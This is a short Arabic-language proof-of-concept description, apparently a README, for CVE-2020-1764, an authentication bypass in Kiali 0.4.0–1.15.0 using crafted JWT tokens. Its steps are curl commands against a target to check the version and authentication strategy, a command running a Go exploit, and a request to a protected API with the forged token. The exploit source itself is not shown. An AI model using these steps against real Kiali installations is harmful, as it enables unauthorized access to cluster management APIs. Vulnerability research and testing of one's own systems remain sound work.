
إثبات مفهوم لاستغلال CVE-2020-1764 لتجاوز المصادقة في Kiali 0.4.0–1.15.0، مما يتيح وصولًا غير مصرح به إلى واجهة برمجة التطبيقات عبر رموز JWT مُصمَّمة خصيصًا.
PoC لتجاوز المصادقة في Kiali من الإصدار 0.4.0 إلى 1.15.0 باستخدام استراتيجية مصادقة تسجيل الدخول (النشرة الأمنية)
تحقق من الإصدار: curl 'http://<IP>/api
تحقق من استراتيجية المصادقة: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"